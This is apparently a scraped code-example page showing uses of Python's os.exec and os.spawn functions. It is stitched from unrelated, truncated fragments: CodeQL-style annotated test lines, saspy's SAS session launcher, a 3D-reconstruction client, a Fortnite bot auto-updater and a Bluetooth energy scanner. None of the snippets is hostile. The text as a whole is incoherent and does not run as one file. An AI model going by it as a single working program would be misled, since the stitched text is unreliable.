    os.execlpe("file", "<progname>", "arg0", env)  # $ getCommand="file" getAPathArgument="file"
    os.execv("path", ["<progname>", "arg0"])  # $ getCommand="path" getAPathArgument="path"
    os.execve("path", ["<progname>", "arg0"], env)  # $ getCommand="path" getAPathArgument="path"
    os.execvp("file", ["<progname>", "arg0"])  # $ getCommand="file" getAPathArgument="file"
    os.execvpe("file", ["<progname>", "arg0"], env)  # $ getCommand="file" getAPathArgument="file"


########################################
# https://docs.python.org/3.8/library/os.html#os.spawnl
env = {"FOO": "foo"}
os.spawnl(os.P_WAIT, "path", "<progname>", "arg0")  # $ getCommand="path" getAPathArgument="path"
os.spawnle(os.P_WAIT, "path", "<progname>", "arg0", env)  # $ getCommand="path" getAPathArgument="path"
os.spawnlp(os.P_WAIT, "file", "<progname>", "arg0")  # $ getCommand="file" getAPathArgument="file"
os.spawnlpe(os.P_WAIT, "file", "<progname>", "arg0", env)  # $ getCommand="file" getAPathArgument="file"
os.spawnv(os.P_WAIT, "path", ["<progname>", "arg0"])  # $ getCommand="path" getAPathArgument="path"
os.spawnve(os.P_WAIT, "path", ["<progname>", "arg0"], env)  # $ getCommand="path" getAPathArgument="path"
os.spawnvp(os.P_WAIT, "file", ["<progname>", "arg0"])  # $ getCommand="file" getAPathArgument="file"
   def _startsas(self):
      if self.pid:
         return self.pid

      # check for local iom server
      if len(self.sascfg.iomhost) > 0:
         zero = False
      else:
         zero = True

      port = 0
      try:
         self.sockin  = socks.socket()
         self.sockin.bind(("",port))
         #self.sockin.bind(("",32701))

         self.sockout = socks.socket()
         self.sockout.bind(("",port))
         #self.sockout.bind(("",32702))

         self.sockerr = socks.socket()
         self.sockerr.bind(("",port))
         #self.sockerr.bind(("",32703))
      except OSError:
         print('Error try to open a socket in the _startsas method. Call failed.')
         return None
      self.sockin.listen(0)
      self.sockout.listen(0)
      self.sockerr.listen(0)

      if not zero:
         if self.sascfg.output.lower() == 'html':
            print("""HTML4 is only valid in 'local' mode (SAS_output_options in sascfg.py).
Please see SAS_config_names templates 'default' (STDIO) or 'winlocal' (IOM) in the default sascfg.py.
Will use HTML5 for this SASsession.""")
            self.sascfg.output = 'html5'

         user  = self.sascfg.omruser
         pw    = self.sascfg.omrpw
         found = False
         if self.sascfg.authkey:
            if os.name == 'nt': 
               pwf = os.path.expanduser('~')+os.sep+'_authinfo'
            else:
               pwf = os.path.expanduser('~')+os.sep+'.authinfo'
            try:
               fid = open(pwf, mode='r')
               for line in fid:
                  if line.startswith(self.sascfg.authkey): 
                     user = line.partition('user')[2].lstrip().partition(' ')[0].partition('\n')[0]
                     pw   = line.partition('password')[2].lstrip().partition(' ')[0].partition('\n')[0]
                     found = True
               fid.close()
            except OSError as e:
               print('Error trying to read authinfo file:'+pwf+'\n'+str(e))
               pass
            except:
               pass

            if not found:
               print('Did not find key '+self.sascfg.authkey+' in authinfo file:'+pwf+'\n')

         while len(user) == 0:
            user = self.sascfg._prompt("Please enter the IOM user id: ")

      pgm    = self.sascfg.java
      parms  = [pgm]
      parms += ["-classpath",  self.sascfg.classpath, "pyiom.saspy2j"]
      #parms += ["-classpath", self.sascfg.classpath+":/u/sastpw/tkpy2j", "pyiom.saspy2j_sleep", "-host", "tomspc.na.sas.com"]
      parms += ["-host", "localhost"] 
      parms += ["-stdinport",  str(self.sockin.getsockname()[1])]
      parms += ["-stdoutport", str(self.sockout.getsockname()[1])]
      parms += ["-stderrport", str(self.sockerr.getsockname()[1])]
      if self.sascfg.timeout is not None:
         parms += ["-timeout", str(self.sascfg.timeout)]
      if self.sascfg.appserver:
         parms += ["-appname", "'"+self.sascfg.appserver+"'"]
      if not zero:
         parms += ["-iomhost", self.sascfg.iomhost, "-iomport", str(self.sascfg.iomport)]     
         parms += ["-user", user]     
      else:
         parms += ["-zero"]     
      parms += ['']

      s = ''
      for i in range(len(parms)):
         if i == 2 and os.name == 'nt':
            s += '"'+parms[i]+'"'+' '
         else:
            s += parms[i]+' '

      if os.name == 'nt': 
         try:
            self.pid = subprocess.Popen(parms, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            pid = self.pid.pid
         except OSError as e:
            print("The OS Error was:\n"+e.strerror+'\n')
            print("SAS Connection failed. No connection established. Double check you settings in sascfg.py file.\n")  
            print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
            print("If no OS Error above, try running the following command (where saspy is running) manually to see what is wrong:\n"+s+"\n")
            return None
      else:
         #signal.signal(signal.SIGCHLD, signal.SIG_IGN)

         PIPE_READ  = 0
         PIPE_WRITE = 1
         
         pin  = os.pipe() 
         pout = os.pipe()
         perr = os.pipe() 
      
         pidpty = os.forkpty()
         if pidpty[0]:
            # we are the parent
            self.pid = pidpty[0]
            pid = self.pid

            os.close(pin[PIPE_READ])
            os.close(pout[PIPE_WRITE]) 
            os.close(perr[PIPE_WRITE]) 

         else:
            # we are the child
            signal.signal(signal.SIGINT, signal.SIG_DFL)

            os.close(0)
            os.close(1)
            os.close(2)
          
            os.dup2(pin[PIPE_READ],   0)
            os.dup2(pout[PIPE_WRITE], 1)
            os.dup2(perr[PIPE_WRITE], 2)
          
            os.close(pin[PIPE_READ])
            os.close(pin[PIPE_WRITE])
            os.close(pout[PIPE_READ])
            os.close(pout[PIPE_WRITE]) 
            os.close(perr[PIPE_READ])
            os.close(perr[PIPE_WRITE]) 
          
            try:
               #sleep(5)
               os.execv(pgm, parms)
            except OSError as e:
               print("The OS Error was:\n"+e.strerror+'\n')
               print("SAS Connection failed. No connection established. Double check you settings in sascfg.py file.\n")  
               print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
               print("If no OS Error above, try running the following command (where saspy is running) manually to see what is wrong:\n"+s+"\n")
               os._exit(-6)

      if os.name == 'nt': 
         try:
            self.pid.wait(1)

            error  = self.pid.stderr.read(4096).decode()+'\n' 
            error += self.pid.stdout.read(4096).decode() 
            print("Java Error:\n"+error)

            print("Subprocess failed to start. Double check you settings in sascfg.py file.\n") 
            print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
            print("If no Java Error above, try running the following command (where saspy is running) manually to see if it's a problem starting Java:\n"+s+"\n")
            self.pid = None
            return None
         except:
            pass
      else:

         self.pid    = pidpty[0]
         self.stdin  = os.fdopen(pin[PIPE_WRITE], mode='wb')
         self.stderr = os.fdopen(perr[PIPE_READ], mode='rb')
         self.stdout = os.fdopen(pout[PIPE_READ], mode='rb')
   
         fcntl.fcntl(self.stdout, fcntl.F_SETFL, os.O_NONBLOCK)
         fcntl.fcntl(self.stderr, fcntl.F_SETFL, os.O_NONBLOCK)

         sleep(1)
         rc = os.waitpid(self.pid, os.WNOHANG)
         if rc[0] == 0:
            pass
         else:
            error  = self.stderr.read1(4096).decode()+'\n' 
            error += self.stdout.read1(4096).decode() 
            print("Java Error:\n"+error)
            print("SAS Connection failed. No connection established. Staus="+str(rc)+"  Double check you settings in sascfg.py file.\n")  
            print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
            print("If no Java Error above, try running the following command (where saspy is running) manually to see if it's a problem starting Java:\n"+s+"\n")
            self.pid = None
            return None

      self.stdin  = self.sockin.accept()
      self.stdout = self.sockout.accept()
      self.stderr = self.sockerr.accept()
      self.stdout[0].setblocking(False)
      self.stderr[0].setblocking(False)

      if not zero:
         while len(pw) == 0:
            pw = self.sascfg._prompt("Please enter the password for IOM user "+self.sascfg.omruser+": ", pw=True)
         pw += '\n'
         self.stdin[0].send(pw.encode())

      ll = self.submit("options svgtitle='svgtitle'; options validvarname=any pagesize=max nosyntaxcheck; ods graphics on;", "text")

      if self.pid is None:
         print(ll['LOG'])
         print("SAS Connection failed. No connection established. Double check you settings in sascfg.py file.\n")  
         print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
         if zero:
            print("Be sure the path to sspiauth.dll is in your System PATH"+"\n")
         return None

      print("SAS Connection established. Subprocess id is "+str(pid)+"\n")  
      return self.pid
            for i in range(0, len(image_bytes), CHUNK_SIZE):
                chunked.append(
                    UploadImageRequest(
                        reconstruction_id=reconstruction_id,
                        image=ImageData(metadata=meta,
                                        data=image_bytes[i:i + CHUNK_SIZE])))
            client.UploadImage(iter(chunked))

    print(f"Requesting reconstruction of {reconstruction_id}")
    reconstruct_response = client.Reconstruct(
        ReconstructRequest(reconstruction_id=reconstruction_id))
    obj_meta = None
    if reconstruct_response.success:
        print("Getting reconstructed OBJ...")
        with open(f"{reconstruction_id}.obj", "wb+") as output_obj, \
            open("texture.tmp", "wb+") as output_texture, \
            open("mtl.tmp", "wb+") as output_mtl:
            for get_obj_response in client.GetOBJ(
                    GetOBJRequest(reconstruction_id=reconstruction_id)):
                obj_meta = get_obj_response.obj.metadata
                output_obj.write(get_obj_response.obj.obj_data)
                output_mtl.write(get_obj_response.obj.mtl_data)
                output_texture.write(get_obj_response.obj.texture_data)
            os.rename("texture.tmp", os.path.basename(obj_meta.texture_path))
            os.rename("mtl.tmp", os.path.basename(obj_meta.mtl_path))
            print(f"Wrote OBJ to {reconstruction_id}.obj")
        os.execv("/usr/bin/meshlab",
                 ['/usr/bin/meshlab', f"{reconstruction_id}.obj"])
    else:
        print("Reconstruction Failed")
Exemple #59
0
        print("更新に失敗しました")
        print("Update failed")
        print(f'{traceback.format_exc()}\n')
        return None


if "-dev" in sys.argv:
    githuburl = "https://raw.githubusercontent.com/gomashio1596/Fortnite-LobbyBot/Dev/"
else:
    githuburl = "https://raw.githubusercontent.com/gomashio1596/Fortnite-LobbyBot/master/"

if CheckUpdate("auto-updater.py", githuburl):
    print("auto-updater.pyの更新を確認しました。アップデーターをもう一度起動します...")
    print("auto-updater.py got updated. Run updater again...\n")
    os.chdir(os.getcwd())
    os.execv(os.sys.executable, ['python', *sys.argv])

flag = False
CheckUpdate("index.py", githuburl)
if CheckUpdate("requirements.txt", githuburl):
    print("requirements.txtの更新を確認しました。INSTALLを実行します")
    print("requirements.txt got updated. Run INSTALL\n")
    flag = True

CheckUpdate("config.json", githuburl)
CheckUpdate("commands.json", githuburl)
CheckUpdate("lang/en.json", githuburl)
CheckUpdate("lang/es.json", githuburl)
CheckUpdate("lang/ja.json", githuburl)
CheckUpdate("LICENSE", githuburl)
                db.insert(data)
                try:
                    r = requests.post(
                        'https://carbon-meter.herokuapp.com/kW-upload',
                        data={'kW': kW})
                    print(r.content)
                except:
                    print('kW upload failed')
                global tries
                tries = 0


# Start scanning
scanner = Scanner().withDelegate(ScanDelegate())
scanner.clear()
scanner.start()

tries = 0

# Keep scanning in  10 second chunks
while True:
    print('Scanning...')
    scanner.process(10)
    tries += 1
    # restart script if no data received after 5 loops
    if tries >= 5:
        print('Restarting')
        sys.stdout.flush()
        os.execv(sys.executable, ['python3'] + sys.argv)
# in case were wanted to finish, we should call 'stop'
scanner.stop()